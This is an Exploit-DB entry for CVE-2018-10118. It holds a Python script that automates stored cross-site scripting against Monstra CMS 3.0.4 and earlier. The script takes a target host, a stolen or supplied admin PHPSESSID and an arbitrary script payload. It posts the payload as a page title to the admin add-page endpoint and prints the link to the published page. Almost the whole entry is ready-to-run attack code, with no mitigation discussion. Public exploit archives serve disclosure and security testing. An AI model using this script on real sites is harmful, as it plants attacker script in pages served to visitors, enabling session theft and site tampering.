Monstra CMS < 3.0.4 - Cross-Site Scripting Automation

EDB-ID: 44855
Author: DEEPIN2
Published: 2018-06-07
CVE: CVE-2018-10118
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: 2018-06-07 
 # Author: DEEPIN2 
 # Software: Monstra CMS 
 # Version: 3.0.4 and earlier 
  
 import requests 
 import re 
  
 def runXSS(target, cookie, data): 
 	exploit = requests.post(target, cookies=cookie, data=data).text 
 	if re.search('exploit', exploit): 
 		return 'OK' 
 	else: 
 		return 'ERROR' 
 	 
 if __name__ == '__main__': 
 	print('''  ______     _______     ____   ___  _  ___        _  ___  _ _  ___ 
  / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / |/ _ \/ / |( _ ) 
 | |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ ` 
 | |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) | 
  \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|\___/|_|_|\___/ 
  	[*] Author : DEEPIN2(Junseo Lee) 
 ---------------------------------------------------------------------''') 
 	print('[*] Ex) http://www.target.com -> www.target.com') 
 	url = input('Target : ') 
 	print('[*] Required admin\'s PHPSESSID.') 
 	PHPSESSID = input('PHPSESSID : ') 
 	pagename = input('Pagename : ') 
 	script = input('Script : ') 
 	target = 'http://' + url + '/admin/index.php?id=pages&action=add_page' 
 	cookie = {'PHPSESSID':PHPSESSID} 
 	data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\ 
 			'page_title':script,\ 
 			'page_name':pagename,\ 
 			'page_meta_title':'',\ 
 			'page_keywords':'',\ 
 			'page_description':'',\ 
 			'pages':0,\ 
 			'templates':'index',\ 
 			'status':'published',\ 
 			'access':'public',\ 
 			'editor':'',\ 
 			'page_tags':'',\ 
 			'add_page_and_exit':'Save+and+Exit',\ 
 			'page_date':'9999-99-99'} 
  
 	result = runXSS(target, cookie, data) 
 	print('-' * 69) 
 	if result == 'OK': 
 		print('[+] LINK : http://' + url + '/' + pagename) 
 	else: 
 		print('[-] Error')

Source: www.exploit-db.com
Related Posts